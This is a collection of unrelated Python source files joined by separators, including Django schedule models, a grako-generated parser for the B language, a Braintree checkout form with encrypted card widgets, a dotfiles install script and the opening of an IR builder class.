        # Build each pipeline policy, honoring caller-supplied overrides in kwargs.
        self.user_agent_policy = kwargs.get('user_agent_policy') or policies.UserAgentPolicy(**kwargs)
        self.headers_policy = kwargs.get('headers_policy') or policies.HeadersPolicy(**kwargs)
        self.proxy_policy = kwargs.get('proxy_policy') or policies.ProxyPolicy(**kwargs)
        self.logging_policy = kwargs.get('logging_policy') or policies.NetworkTraceLoggingPolicy(**kwargs)
        self.retry_policy = kwargs.get('retry_policy') or policies.RetryPolicy(**kwargs)
        self.custom_hook_policy = kwargs.get('custom_hook_policy') or policies.CustomHookPolicy(**kwargs)
        self.redirect_policy = kwargs.get('redirect_policy') or policies.RedirectPolicy(**kwargs)
        self.authentication_policy = kwargs.get('authentication_policy')
        # Default to bearer-token auth using the configured scopes when the
        # caller did not supply an explicit authentication policy.
        if self.credential and not self.authentication_policy:
            self.authentication_policy = policies.BearerTokenCredentialPolicy(self.credential, *self.credential_scopes, **kwargs)
|
from django.db import models
from datetime import datetime
class Place(models.Model):
    """
    Holder object for basic info about the rooms
    in the university.
    """
    # Human-readable room label, e.g. a room number or name.
    room_place = models.CharField(max_length=255)
    floor = models.IntegerField()

    def __unicode__(self):
        return self.room_place
class HierarchyUnit(models.Model):
    """Node in the program/year/group hierarchy; parent links build the tree."""
    PROGRAM = 'PR'
    YEAR = 'YR'
    GROUP = 'GR'
    TYPES = (
        (PROGRAM, u"Специалност"),
        (YEAR, u"Курс"),
        (GROUP, u"Група"),
    )
    type_value = models.CharField(max_length=255, choices=TYPES)
    value = models.CharField(max_length=255)
    # Self-referential link: a year points at its program, a group at its year.
    parent = models.ForeignKey("schedule.HierarchyUnit", null=True, blank=True, default=None)

    def get_all_info_for_parents(self):
        """Build a display string including ancestor values.

        Assumes the parent chain is populated for YR/GR nodes (parent is
        nullable) -- TODO confirm callers guarantee this.
        """
        if self.type_value == 'PR':
            return self.value
        if self.type_value == 'YR':
            return ', '.join([self.parent.value, self.value+u' курс'])
        else:
            return ', '.join([self.parent.parent.value, self.parent.value+u' курс', self.value+u' група'])

    def get_all_childs(self):
        # Direct children only (one level down).
        return HierarchyUnit.objects.filter(parent=self)

    def __unicode__(self):
        return self.get_all_info_for_parents()
class Block(models.Model):
    """
    Group representing a set of optional subjects.
    Example: Core of Computer Science.
    """
    name = models.CharField(max_length=255)

    def __unicode__(self):
        return self.name
class Subject(models.Model):
    """
    Representation of all subjects.
    Example: Calculus 1.
    """
    MANDATORY = 'MN'
    OPTIONAL = 'OP'
    TYPES = (
        (MANDATORY, u"Задължителен"),
        (OPTIONAL, u"Избираем"),
    )
    type_value = models.CharField(max_length=255, choices=TYPES)
    name = models.CharField(max_length=255)
    # Optional subjects belong to a Block; mandatory ones may leave it NULL.
    block = models.ForeignKey(Block, null=True, blank=True, default=None)
    year = models.ForeignKey(HierarchyUnit, null=True, blank=True, default=None, limit_choices_to={'type_value': HierarchyUnit.YEAR})

    def get_year_value(self):
        # Assumes year (nullable FK) and its parent are set -- TODO confirm.
        return ', '.join([self.year.parent.value, self.year.value+u' курс'])

    def __unicode__(self):
        return self.name
class Department(models.Model):
    """
    Group representing a set of lecturers
    grouped by field of teaching.
    """
    name = models.CharField(max_length=255)

    def __unicode__(self):
        return self.name
class Teacher(models.Model):
    """A lecturer, optionally linked to subjects taught and a department."""
    name = models.CharField(max_length=255)
    title = models.CharField(max_length=255)
    email = models.CharField(max_length=255)
    full_name = models.CharField(max_length=255)
    position = models.CharField(max_length=255)
    # NOTE(review): null=True has no effect on ManyToManyField (per Django
    # docs); kept to avoid a spurious migration.
    subjects = models.ManyToManyField(Subject, null=True, blank=True, default=None)
    department = models.ForeignKey(Department, null=True, blank=True, default=None)

    def __unicode__(self):
        return self.name
class Event(models.Model):
    """A (possibly weekly) scheduled event tied to a subject, teacher and place."""
    WEEKLY = 'WKL'
    TYPES = (
        (WEEKLY, u'Седмично'),
    )
    type_value = models.CharField(max_length=255, null=True, blank=True, default=None)
    # Pass the callable itself, not its result: ``datetime.now()`` would be
    # evaluated once at import time, stamping every row with the process
    # start time instead of the row creation time.
    inserted = models.DateField(default=datetime.now)
    name = models.CharField(max_length=255)
    place = models.ForeignKey(Place, blank=True, default=None, null=True)
    date_start = models.DateTimeField()
    date_end = models.DateTimeField(default=datetime.now)
    repeatable = models.BooleanField()
    # NOTE(review): field name is misspelled ("duratation"); renaming would
    # require a schema migration, so it is kept as-is.
    duratation = models.IntegerField()
    subject = models.ForeignKey(Subject, blank=True, default=None, null=True)
    teacher = models.ForeignKey(Teacher, blank=True, default=None, null=True)

    def __unicode__(self):
        return self.name
class Student(models.Model):
    """A student, placed in a group of the hierarchy and linked to events."""
    PROGRAM = (('BK', 'Бакалавър'),('MG', 'Магистър'))
    name = models.CharField(max_length=255)
    program = models.CharField(max_length=255,choices=PROGRAM, blank=True, default=PROGRAM[0][0])
    fac_number = models.CharField(max_length=255)
    email = models.CharField(max_length=255)
    group = models.ForeignKey(HierarchyUnit, limit_choices_to={'type_value': HierarchyUnit.GROUP}, blank=True, default=None, null=True)
    # NOTE(review): null=True has no effect on ManyToManyField (per Django
    # docs); kept to avoid a spurious migration.
    events = models.ManyToManyField(Event, blank=True, default=None, null=True)

    def __unicode__(self):
        return self.name
class Comment(models.Model):
    """A student's comment on an event over a date range."""
    from_user = models.ForeignKey(Student, blank=True, default=None, null=True)
    event = models.ForeignKey(Event, blank=True, default=None, null=True)
    start_date = models.DateField()
    end_date = models.DateField()
    # Pass the callable, not datetime.now(): calling it would freeze the
    # default at import time for every row.
    dtstamp = models.DateField(default=datetime.now)
    desc = models.TextField()
|
from cherrydo.utils import is_cherrydo_project
class CherryDoException(Exception):
    """Raised for CherryDo-specific failures (e.g. running outside a project)."""
    pass
class BaseGenerator(object):
    """Base class for generators: holds a name/params pair and defines the
    lifecycle hooks (validate / default_context / create) subclasses override."""

    def __init__(self, name, params):
        self.name = name
        self.params = params

    def formatted_name(self):
        """Convert an underscored name to CamelCase, e.g. 'my_page' -> 'MyPage'."""
        spaced = self.name.replace('_', ' ')
        return spaced.title().replace(' ', '')

    def validate(self):
        """Hook: raise to abort generation; the default accepts everything."""
        pass

    def default_context(self):
        """Hook: extra template context; the default is empty."""
        return {}

    def create(self):
        """Hook: perform the generation; the default just reports success."""
        return True
class CherryDoGenerator(BaseGenerator):
    # Generator that refuses to run outside a CherryDo project directory.
    def validate(self):
        """Raise CherryDoException when the cwd is not a CherryDo project."""
        if not is_cherrydo_project():
            raise CherryDoException('CherryDo project not found!')
|
from libdotfiles.packages import try_install
from libdotfiles.util import HOME_DIR, PKG_DIR, copy_file
# Install alacritty and deploy its configuration into ~/.config.
try_install("alacritty")
copy_file(
    PKG_DIR / "alacritty.yml",
    HOME_DIR / ".config" / "alacritty" / "alacritty.yml",
)
|
from __future__ import print_function, division, absolute_import, unicode_literals
from grako.parsing import graken, Parser
from grako.util import re, RE_FLAGS
# Module metadata for the grako-generated parser; __all__ declares the
# public API (parser, default semantics, CLI entry point).
__version__ = (2015, 12, 26, 22, 15, 59, 5)

__all__ = [
    'BParser',
    'BSemantics',
    'main'
]
class BParser(Parser):
    """Machine-generated recursive-descent parser for the B language
    (emitted by grako). Do not edit by hand -- regenerate from the grammar;
    each ``_rule_`` method mirrors one grammar rule."""

    def __init__(self,
                 whitespace=None,
                 nameguard=None,
                 comments_re='/\\*((?:[^\\*]|\\*[^/]|\\n)*?)\\*+/',
                 eol_comments_re=None,
                 ignorecase=None,
                 left_recursion=False,
                 **kwargs):
        super(BParser, self).__init__(
            whitespace=whitespace,
            nameguard=nameguard,
            comments_re=comments_re,
            eol_comments_re=eol_comments_re,
            ignorecase=ignorecase,
            left_recursion=left_recursion,
            **kwargs
        )

    @graken()
    def _program_(self):
        def block1():
            self._definition_()
            self._cut()
        self._closure(block1)
        self.ast['@'] = self.last_node
        self._check_eof()

    @graken()
    def _definition_(self):
        with self._choice():
            with self._option():
                self._simpledef_()
            with self._option():
                self._vectordef_()
            with self._option():
                self._functiondef_()
            self._error('no available options')

    @graken()
    def _simpledef_(self):
        self._name_()
        self.ast['name'] = self.last_node
        with self._optional():
            self._ival_()
            self.ast['init'] = self.last_node
        self._token(';')

        self.ast._define(
            ['name', 'init'],
            []
        )

    @graken()
    def _vectordef_(self):
        self._name_()
        self.ast['name'] = self.last_node
        self._token('[')
        with self._optional():
            self._constantexpr_()
            self.ast['maxidx'] = self.last_node
        self._token(']')
        with self._optional():
            self._ivallist_()
            self.ast['ivals'] = self.last_node
        self._token(';')

        self.ast._define(
            ['name', 'maxidx', 'ivals'],
            []
        )

    @graken()
    def _ivallist_(self):
        self._ival_()
        self.ast.setlist('@', self.last_node)

        def block1():
            self._token(',')
            self._ival_()
            self.ast.setlist('@', self.last_node)
        self._closure(block1)

    @graken()
    def _ival_(self):
        with self._choice():
            with self._option():
                self._numericexpr_()
            with self._option():
                self._characterexpr_()
            with self._option():
                self._stringexpr_()
            self._error('no available options')

    @graken()
    def _functiondef_(self):
        self._name_()
        self.ast['name'] = self.last_node
        self._token('(')
        with self._optional():
            self._namelist_()
            self.ast['args'] = self.last_node
        self._token(')')
        self._cut()
        self._statement_()
        self.ast['body'] = self.last_node

        self.ast._define(
            ['name', 'args', 'body'],
            []
        )

    @graken()
    def _statement_(self):
        with self._choice():
            with self._option():
                self._labelstatement_()
            with self._option():
                self._gotostatement_()
            with self._option():
                self._switchstatement_()
            with self._option():
                self._casestatement_()
            with self._option():
                self._breakstatement_()
            with self._option():
                self._autostatement_()
            with self._option():
                self._extrnstatement_()
            with self._option():
                self._compoundstatement_()
            with self._option():
                self._ifstatement_()
            with self._option():
                self._whilestatement_()
            with self._option():
                self._returnstatement_()
            with self._option():
                self._exprstatement_()
            with self._option():
                self._nullstatement_()
            self._error('no available options')

    @graken()
    def _labelstatement_(self):
        with self._ifnot():
            with self._group():
                self._token('default')
        self._name_()
        self.ast['label'] = self.last_node
        self._token(':')
        self._statement_()
        self.ast['statement'] = self.last_node

        self.ast._define(
            ['label', 'statement'],
            []
        )

    @graken()
    def _gotostatement_(self):
        self._token('goto')
        self._cut()
        self._name_()
        self.ast['label'] = self.last_node
        self._token(';')

        self.ast._define(
            ['label'],
            []
        )

    @graken()
    def _switchstatement_(self):
        self._token('switch')
        self._cut()
        self._expr_()
        self.ast['rvalue'] = self.last_node
        self._cut()
        self._statement_()
        self.ast['body'] = self.last_node

        self.ast._define(
            ['rvalue', 'body'],
            []
        )

    @graken()
    def _casestatement_(self):
        with self._group():
            with self._choice():
                with self._option():
                    with self._group():
                        self._token('case')
                        self._constantexpr_()
                        self.ast['cond'] = self.last_node
                with self._option():
                    self._token('default')
                self._error('expecting one of: default')
        self._cut()
        self._token(':')
        self._statement_()
        self.ast['then'] = self.last_node

        self.ast._define(
            ['cond', 'then'],
            []
        )

    @graken()
    def _breakstatement_(self):
        self._token('break')
        self._token(';')

    @graken()
    def _autostatement_(self):
        self._token('auto')
        self._cut()
        self._autovar_()
        self.ast.setlist('@', self.last_node)

        def block1():
            self._token(',')
            self._autovar_()
            self.ast.setlist('@', self.last_node)
        self._closure(block1)
        self._token(';')

    @graken()
    def _autovar_(self):
        self._name_()
        self.ast['name'] = self.last_node
        with self._optional():
            self._token('[')
            self._constantexpr_()
            self.ast['maxidx'] = self.last_node
            self._token(']')

        self.ast._define(
            ['name', 'maxidx'],
            []
        )

    @graken()
    def _extrnstatement_(self):
        self._token('extrn')
        self._cut()
        self._namelist_()
        self.ast['@'] = self.last_node
        self._token(';')

    @graken()
    def _compoundstatement_(self):
        self._token('{')
        self._cut()

        def block1():
            self._statement_()
            self._cut()
        self._closure(block1)
        self.ast['@'] = self.last_node
        self._token('}')

    @graken()
    def _ifstatement_(self):
        self._token('if')
        self._cut()
        self._token('(')
        self._expr_()
        self.ast['cond'] = self.last_node
        self._token(')')
        self._statement_()
        self.ast['then'] = self.last_node
        with self._optional():
            self._token('else')
            self._statement_()
            self.ast['otherwise'] = self.last_node

        self.ast._define(
            ['cond', 'then', 'otherwise'],
            []
        )

    @graken()
    def _whilestatement_(self):
        self._token('while')
        self._cut()
        self._token('(')
        self._expr_()
        self.ast['cond'] = self.last_node
        self._token(')')
        self._statement_()
        self.ast['body'] = self.last_node

        self.ast._define(
            ['cond', 'body'],
            []
        )

    @graken()
    def _returnstatement_(self):
        self._token('return')
        self._cut()
        with self._optional():
            self._token('(')
            self._expr_()
            self.ast['return_value'] = self.last_node
            self._token(')')
        self._token(';')

        self.ast._define(
            ['return_value'],
            []
        )

    @graken()
    def _exprstatement_(self):
        self._expr_()
        self.ast['@'] = self.last_node
        self._token(';')

    @graken()
    def _nullstatement_(self):
        self._token(';')

    @graken()
    def _expr_(self):
        self._assignexpr_()

    @graken()
    def _assignexpr_(self):
        self._condexpr_()
        self.ast['lhs'] = self.last_node
        with self._optional():
            self._assignop_()
            self.ast['op'] = self.last_node
            self._assignexpr_()
            self.ast['rhs'] = self.last_node

        self.ast._define(
            ['lhs', 'op', 'rhs'],
            []
        )

    @graken()
    def _assignop_(self):
        self._pattern(r'=([+\-/\*%&^|]|[=!]=|>[=>]?|<[=<]?)?')

    @graken()
    def _condexpr_(self):
        self._orexpr_()
        self.ast['cond'] = self.last_node
        with self._optional():
            self._token('?')
            self._condexpr_()
            self.ast['then'] = self.last_node
            self._token(':')
            self._condexpr_()
            self.ast['otherwise'] = self.last_node

        self.ast._define(
            ['cond', 'then', 'otherwise'],
            []
        )

    @graken()
    def _orexpr_(self):
        self._xorexpr_()
        self.ast['lhs'] = self.last_node

        def block2():
            self._ortail_()
        self._closure(block2)
        self.ast['tail'] = self.last_node

        self.ast._define(
            ['lhs', 'tail'],
            []
        )

    @graken()
    def _ortail_(self):
        self._token('|')
        self.ast['op'] = self.last_node
        self._xorexpr_()
        self.ast['rhs'] = self.last_node

        self.ast._define(
            ['op', 'rhs'],
            []
        )

    @graken()
    def _xorexpr_(self):
        self._andexpr_()
        self.ast['lhs'] = self.last_node

        def block2():
            self._xortail_()
        self._closure(block2)
        self.ast['tail'] = self.last_node

        self.ast._define(
            ['lhs', 'tail'],
            []
        )

    @graken()
    def _xortail_(self):
        self._token('^')
        self.ast['op'] = self.last_node
        self._andexpr_()
        self.ast['rhs'] = self.last_node

        self.ast._define(
            ['op', 'rhs'],
            []
        )

    @graken()
    def _andexpr_(self):
        self._eqexpr_()
        self.ast['lhs'] = self.last_node

        def block2():
            self._andtail_()
        self._closure(block2)
        self.ast['tail'] = self.last_node

        self.ast._define(
            ['lhs', 'tail'],
            []
        )

    @graken()
    def _andtail_(self):
        self._token('&')
        self.ast['op'] = self.last_node
        self._eqexpr_()
        self.ast['rhs'] = self.last_node

        self.ast._define(
            ['op', 'rhs'],
            []
        )

    @graken()
    def _eqexpr_(self):
        self._relexpr_()
        self.ast['lhs'] = self.last_node

        def block2():
            self._eqtail_()
        self._closure(block2)
        self.ast['tail'] = self.last_node

        self.ast._define(
            ['lhs', 'tail'],
            []
        )

    @graken()
    def _eqtail_(self):
        self._eqop_()
        self.ast['op'] = self.last_node
        self._relexpr_()
        self.ast['rhs'] = self.last_node

        self.ast._define(
            ['op', 'rhs'],
            []
        )

    @graken()
    def _eqop_(self):
        self._pattern(r'[!=]=')

    @graken()
    def _relexpr_(self):
        self._shiftexpr_()
        self.ast['lhs'] = self.last_node

        def block2():
            self._reltail_()
        self._closure(block2)
        self.ast['tail'] = self.last_node

        self.ast._define(
            ['lhs', 'tail'],
            []
        )

    @graken()
    def _reltail_(self):
        self._relop_()
        self.ast['op'] = self.last_node
        self._shiftexpr_()
        self.ast['rhs'] = self.last_node

        self.ast._define(
            ['op', 'rhs'],
            []
        )

    @graken()
    def _relop_(self):
        self._pattern(r'[<>]={0,1}')

    @graken()
    def _shiftexpr_(self):
        self._addexpr_()
        self.ast['lhs'] = self.last_node

        def block2():
            self._shifttail_()
        self._closure(block2)
        self.ast['tail'] = self.last_node

        self.ast._define(
            ['lhs', 'tail'],
            []
        )

    @graken()
    def _shifttail_(self):
        self._shiftop_()
        self.ast['op'] = self.last_node
        self._addexpr_()
        self.ast['rhs'] = self.last_node

        self.ast._define(
            ['op', 'rhs'],
            []
        )

    @graken()
    def _shiftop_(self):
        self._pattern(r'<<|>>')

    @graken()
    def _addexpr_(self):
        self._multexpr_()
        self.ast['lhs'] = self.last_node

        def block2():
            self._addtail_()
        self._closure(block2)
        self.ast['tail'] = self.last_node

        self.ast._define(
            ['lhs', 'tail'],
            []
        )

    @graken()
    def _addtail_(self):
        self._addop_()
        self.ast['op'] = self.last_node
        self._multexpr_()
        self.ast['rhs'] = self.last_node

        self.ast._define(
            ['op', 'rhs'],
            []
        )

    @graken()
    def _addop_(self):
        self._pattern(r'[+-]')

    @graken()
    def _multexpr_(self):
        self._unaryexpr_()
        self.ast['lhs'] = self.last_node

        def block2():
            self._multtail_()
        self._closure(block2)
        self.ast['tail'] = self.last_node

        self.ast._define(
            ['lhs', 'tail'],
            []
        )

    @graken()
    def _multtail_(self):
        self._multop_()
        self.ast['op'] = self.last_node
        self._unaryexpr_()
        self.ast['rhs'] = self.last_node

        self.ast._define(
            ['op', 'rhs'],
            []
        )

    @graken()
    def _multop_(self):
        self._pattern(r'[/%\*]')

    @graken()
    def _unaryexpr_(self):
        def block1():
            self._leftunaryop_()
        self._closure(block1)
        self.ast['leftops'] = self.last_node
        self._primaryexpr_()
        self.ast['rhs'] = self.last_node

        def block4():
            self._rightunaryop_()
        self._closure(block4)
        self.ast['rightops'] = self.last_node

        self.ast._define(
            ['leftops', 'rhs', 'rightops'],
            []
        )

    @graken()
    def _leftunaryop_(self):
        self._pattern(r'[\*&!\~]|--?|\+\+')

    @graken()
    def _rightunaryop_(self):
        with self._choice():
            with self._option():
                self._token('++')
            with self._option():
                self._token('--')
            self._error('expecting one of: ++ --')

    @graken()
    def _primaryexpr_(self):
        self._primaryexprhead_()
        self.ast['head'] = self.last_node

        def block2():
            self._primaryexprtail_()
        self._closure(block2)
        self.ast['tail'] = self.last_node

        self.ast._define(
            ['head', 'tail'],
            []
        )

    @graken()
    def _primaryexprhead_(self):
        with self._choice():
            with self._option():
                self._token('(')
                self._expr_()
                self.ast['@'] = self.last_node
                self._token(')')
            with self._option():
                self._builtinexpr_()
            with self._option():
                self._variableexpr_()
            with self._option():
                self._constantexpr_()
            with self._option():
                self._stringexpr_()
            self._error('no available options')

    @graken()
    def _primaryexprtail_(self):
        with self._choice():
            with self._option():
                self._token('(')
                with self._optional():
                    self._exprlist_()
                    self.ast['args'] = self.last_node
                self._token(')')
            with self._option():
                self._token('[')
                self._expr_()
                self.ast['index'] = self.last_node
                self._token(']')
            self._error('expecting one of: (')

        self.ast._define(
            ['args', 'index'],
            []
        )

    @graken()
    def _variableexpr_(self):
        with self._ifnot():
            self._builtinexpr_()
        self._name_()

    @graken()
    def _constantexpr_(self):
        with self._choice():
            with self._option():
                self._numericexpr_()
            with self._option():
                self._characterexpr_()
            self._error('no available options')

    @graken()
    def _builtinexpr_(self):
        self._token('__bytes_per_word')

    @graken()
    def _numericexpr_(self):
        def block0():
            self._NUMERIC_()
        self._positive_closure(block0)

    @graken()
    def _characterexpr_(self):
        self._token("'")

        def block1():
            self._CHARACTERCONSTCHAR_()
        self._closure(block1)
        self.ast['@'] = self.last_node
        self._token("'")

    @graken()
    def _stringexpr_(self):
        self._token('"')

        def block1():
            self._STRINGCONSTCHAR_()
        self._closure(block1)
        self.ast['@'] = self.last_node
        self._token('"')

    @graken()
    def _name_(self):
        self._ALPHA_()
        self.ast['head'] = self.last_node

        def block2():
            with self._choice():
                with self._option():
                    self._ALPHA_()
                with self._option():
                    self._NUMERIC_()
                self._error('no available options')
        self._closure(block2)
        self.ast['tail'] = self.last_node

        self.ast._define(
            ['head', 'tail'],
            []
        )

    @graken()
    def _ALPHA_(self):
        self._pattern(r'[A-Za-z_\.\b]')

    @graken()
    def _NUMERIC_(self):
        self._pattern(r'[0-9]')

    @graken()
    def _CHARACTERCONSTCHAR_(self):
        self._pattern(r"([^'\*])|(\*.)")

    @graken()
    def _STRINGCONSTCHAR_(self):
        self._pattern(r'([^"\*])|(\*.)')

    @graken()
    def _exprlist_(self):
        self._expr_()
        self.ast.setlist('@', self.last_node)

        def block1():
            self._token(',')
            self._expr_()
            self.ast.setlist('@', self.last_node)
        self._closure(block1)

    @graken()
    def _namelist_(self):
        self._name_()
        self.ast.setlist('@', self.last_node)

        def block1():
            self._token(',')
            self._name_()
            self.ast.setlist('@', self.last_node)
        self._closure(block1)
class BSemantics(object):
    """Default (generated) semantics: every rule returns its AST unchanged.
    Subclass and override individual methods to transform parse nodes."""

    def program(self, ast):
        return ast

    def definition(self, ast):
        return ast

    def simpledef(self, ast):
        return ast

    def vectordef(self, ast):
        return ast

    def ivallist(self, ast):
        return ast

    def ival(self, ast):
        return ast

    def functiondef(self, ast):
        return ast

    def statement(self, ast):
        return ast

    def labelstatement(self, ast):
        return ast

    def gotostatement(self, ast):
        return ast

    def switchstatement(self, ast):
        return ast

    def casestatement(self, ast):
        return ast

    def breakstatement(self, ast):
        return ast

    def autostatement(self, ast):
        return ast

    def autovar(self, ast):
        return ast

    def extrnstatement(self, ast):
        return ast

    def compoundstatement(self, ast):
        return ast

    def ifstatement(self, ast):
        return ast

    def whilestatement(self, ast):
        return ast

    def returnstatement(self, ast):
        return ast

    def exprstatement(self, ast):
        return ast

    def nullstatement(self, ast):
        return ast

    def expr(self, ast):
        return ast

    def assignexpr(self, ast):
        return ast

    def assignop(self, ast):
        return ast

    def condexpr(self, ast):
        return ast

    def orexpr(self, ast):
        return ast

    def ortail(self, ast):
        return ast

    def xorexpr(self, ast):
        return ast

    def xortail(self, ast):
        return ast

    def andexpr(self, ast):
        return ast

    def andtail(self, ast):
        return ast

    def eqexpr(self, ast):
        return ast

    def eqtail(self, ast):
        return ast

    def eqop(self, ast):
        return ast

    def relexpr(self, ast):
        return ast

    def reltail(self, ast):
        return ast

    def relop(self, ast):
        return ast

    def shiftexpr(self, ast):
        return ast

    def shifttail(self, ast):
        return ast

    def shiftop(self, ast):
        return ast

    def addexpr(self, ast):
        return ast

    def addtail(self, ast):
        return ast

    def addop(self, ast):
        return ast

    def multexpr(self, ast):
        return ast

    def multtail(self, ast):
        return ast

    def multop(self, ast):
        return ast

    def unaryexpr(self, ast):
        return ast

    def leftunaryop(self, ast):
        return ast

    def rightunaryop(self, ast):
        return ast

    def primaryexpr(self, ast):
        return ast

    def primaryexprhead(self, ast):
        return ast

    def primaryexprtail(self, ast):
        return ast

    def variableexpr(self, ast):
        return ast

    def constantexpr(self, ast):
        return ast

    def builtinexpr(self, ast):
        return ast

    def numericexpr(self, ast):
        return ast

    def characterexpr(self, ast):
        return ast

    def stringexpr(self, ast):
        return ast

    def name(self, ast):
        return ast

    def ALPHA(self, ast):
        return ast

    def NUMERIC(self, ast):
        return ast

    def CHARACTERCONSTCHAR(self, ast):
        return ast

    def STRINGCONSTCHAR(self, ast):
        return ast

    def exprlist(self, ast):
        return ast

    def namelist(self, ast):
        return ast
def main(filename, startrule, trace=False, whitespace=None, nameguard=None):
    """Parse *filename* starting at *startrule*; print the AST and its JSON form."""
    import json
    with open(filename) as f:
        text = f.read()
    parser = BParser(parseinfo=False)
    ast = parser.parse(
        text,
        startrule,
        filename=filename,
        trace=trace,
        whitespace=whitespace,
        nameguard=nameguard)
    print('AST:')
    print(ast)
    print()
    print('JSON:')
    print(json.dumps(ast, indent=2))
    print()
if __name__ == '__main__':
    import argparse
    import string
    import sys

    class ListRules(argparse.Action):
        # argparse action: print all grammar rules and exit immediately.
        def __call__(self, parser, namespace, values, option_string):
            print('Rules:')
            for r in BParser.rule_list():
                print(r)
            print()
            sys.exit(0)

    parser = argparse.ArgumentParser(description="Simple parser for B.")
    parser.add_argument('-l', '--list', action=ListRules, nargs=0,
                        help="list all rules and exit")
    parser.add_argument('-n', '--no-nameguard', action='store_true',
                        dest='no_nameguard',
                        help="disable the 'nameguard' feature")
    parser.add_argument('-t', '--trace', action='store_true',
                        help="output trace information")
    parser.add_argument('-w', '--whitespace', type=str, default=string.whitespace,
                        help="whitespace specification")
    parser.add_argument('file', metavar="FILE", help="the input file to parse")
    parser.add_argument('startrule', metavar="STARTRULE",
                        help="the start rule for parsing")
    args = parser.parse_args()

    main(
        args.file,
        args.startrule,
        trace=args.trace,
        whitespace=args.whitespace,
        nameguard=not args.no_nameguard
    )
|
from django import forms
from django.utils.translation import ugettext_lazy as _
from django.utils.html import format_html
from django.forms.util import flatatt
from django.utils.encoding import force_text
from mezzanine.conf import settings
from cartridge.shop.forms import OrderForm
from cartridge.shop import checkout
from cartridge.shop.utils import make_choices
from cartridge_braintree.countries import get_country_names_list
class DataEncryptedTextInput(forms.TextInput):
    """Text input rendered with the data-encrypted-name attribute that
    braintree.js uses to encrypt the value client-side."""

    def render(self, name, value, attrs=None):
        # See django.forms.widgets.py,
        # class Input, method render()
        if value is None:
            value = ''
        if attrs is None:
            attrs = {}
        attrs['name'] = name
        # Disable browser autofill for sensitive card data.
        attrs['autocomplete'] = 'off'
        attrs['data-encrypted-name'] = name
        final_attrs = self.build_attrs(attrs, type=self.input_type)
        # Never add the value to the HTML rendering, this field
        # will be encrypted and should remain blank if the form is
        # re-loaded!
        final_attrs['value'] = ''
        return format_html('<input{0} />', flatatt(final_attrs))
class DataEncryptedPasswordInput(DataEncryptedTextInput):
    """Same encrypted rendering, but as a masked password input (for the CCV)."""
    input_type = 'password'
class BraintreeOrderForm(OrderForm):
    """
    The following changes are made to the cartridge order form:

    - Shipping and Billing country fields are rendered using
      a Select widget. This ensures the country selected can be
      converted to a valid code for Braintree's payment processing.
    - Credit Card number and CCV fields are rendered using the
      DataEncryptedTextInput and DataEncryptedPasswordInput widgets
      so that the HTML form inputs match what is required for braintree.js

    See https://www.braintreepayments.com/docs/python/guide/getting_paid
    """
    def __init__(self, request, step, data=None, initial=None, errors=None):
        OrderForm.__init__(self, request, step, data, initial, errors)
        is_first_step = step == checkout.CHECKOUT_STEP_FIRST
        is_payment_step = step == checkout.CHECKOUT_STEP_PAYMENT
        # Get list of country names
        countries = make_choices(get_country_names_list())
        if settings.SHOP_CHECKOUT_STEPS_SPLIT:
            if is_first_step:
                self._use_country_selects(countries)
            if is_payment_step:
                self._use_encrypted_card_widgets()
        else:
            self._use_country_selects(countries)
            if settings.SHOP_PAYMENT_STEP_ENABLED:
                self._use_encrypted_card_widgets()

    def _use_country_selects(self, countries):
        # Replace the free-text country inputs with fixed choices so the
        # selection can always be mapped to a valid code for Braintree.
        for field_name in ("billing_detail_country", "shipping_detail_country"):
            self.fields[field_name].widget = forms.Select(choices=countries)
            self.fields[field_name].initial = settings.SHOP_DEFAULT_COUNTRY

    def _use_encrypted_card_widgets(self):
        # braintree.js encrypts these client-side; the widgets emit the
        # data-encrypted-name attributes it expects.
        self.fields["card_number"].widget = DataEncryptedTextInput()
        self.fields["card_ccv"].widget = DataEncryptedPasswordInput()
|
from impact.tests.api_test_case import APITestCase
from impact.tests.factories import JudgingRoundFactory
class TestJudgingRound(APITestCase):
    def test_str(self):
        """The string form of a judging round mentions its name and program."""
        instance = JudgingRoundFactory()
        rendered = str(instance)
        assert instance.name in rendered
        assert str(instance.program) in rendered
|
__author__ = 'sarangis'
from src.ir.function import *
from src.ir.module import *
from src.ir.instructions import *
def _make_binary_operators():
    """Build the operator-symbol -> callable table used by constant folding."""
    ops = {}
    ops['+'] = lambda x, y: x + y
    ops['-'] = lambda x, y: x - y
    ops['*'] = lambda x, y: x * y
    ops['**'] = lambda x, y: x ** y
    ops['/'] = lambda x, y: x / y
    ops['//'] = lambda x, y: x // y
    ops['<<'] = lambda x, y: x << y
    ops['>>'] = lambda x, y: x >> y
    # The right operand is coerced to the left operand's type before '%'
    # (presumably to keep mixed-type modulo in the left operand's domain) —
    # preserved as-is.
    ops['%'] = lambda x, y: x % type(x)(y)
    ops['&'] = lambda x, y: x & y
    ops['|'] = lambda x, y: x | y
    ops['^'] = lambda x, y: x ^ y
    return ops

BINARY_OPERATORS = _make_binary_operators()
class IRBuilder:
    """ The main builder to be used for creating instructions. This has to be used to insert / create / modify instructions
    This class will have to support all the other class creating it.
    """
    def __init__(self, current_module=None, context=None):
        # Module the builder emits into; may also be attached later via the
        # `module` property.
        self.__module = current_module
        # Either a BasicBlock (append into it) or an Instruction (insert
        # relative to it); see insert_after / insert_before.
        self.__insertion_point = None
        # Index of the insertion point inside its basic block; -1 means
        # "no concrete position yet" and new instructions become orphans.
        self.__insertion_point_idx = 0
        self.__orphaned_instructions = []
        self.__context = context
        self.__current_bb = None

    @property
    def module(self):
        return self.__module

    @module.setter
    def module(self, mod):
        self.__module = mod

    @property
    def context(self):
        return self.__context

    @context.setter
    def context(self, ctx):
        self.__context = ctx

    def get_current_bb(self):
        """Return the basic block instructions are currently emitted into."""
        assert self.__current_bb is not None
        return self.__current_bb

    def insert_after(self, ip):
        """Place the insertion point just after `ip`.

        `ip` is either a BasicBlock (append to its end) or an Instruction
        (emit right after that instruction).
        Raises InvalidInstructionException / InvalidTypeException on bad input.
        """
        if isinstance(ip, BasicBlock):
            self.__insertion_point = ip
            self.__insertion_point_idx = 0
            self.__current_bb = ip
        elif isinstance(ip, Instruction):
            self.__insertion_point = ip
            self.__insertion_point_idx = ip.parent.find_instruction_idx(ip)
            if self.__insertion_point_idx is None:
                # Fixed message typo ("Count not" -> "Could not").
                raise InvalidInstructionException("Could not find instruction in its parent basic block")
            else:
                self.__insertion_point_idx += 1
        else:
            raise InvalidTypeException("Expected either Basic Block or Instruction")

    def insert_before(self, ip):
        """Place the insertion point just before `ip` (BasicBlock or Instruction)."""
        if isinstance(ip, BasicBlock):
            self.__insertion_point = ip
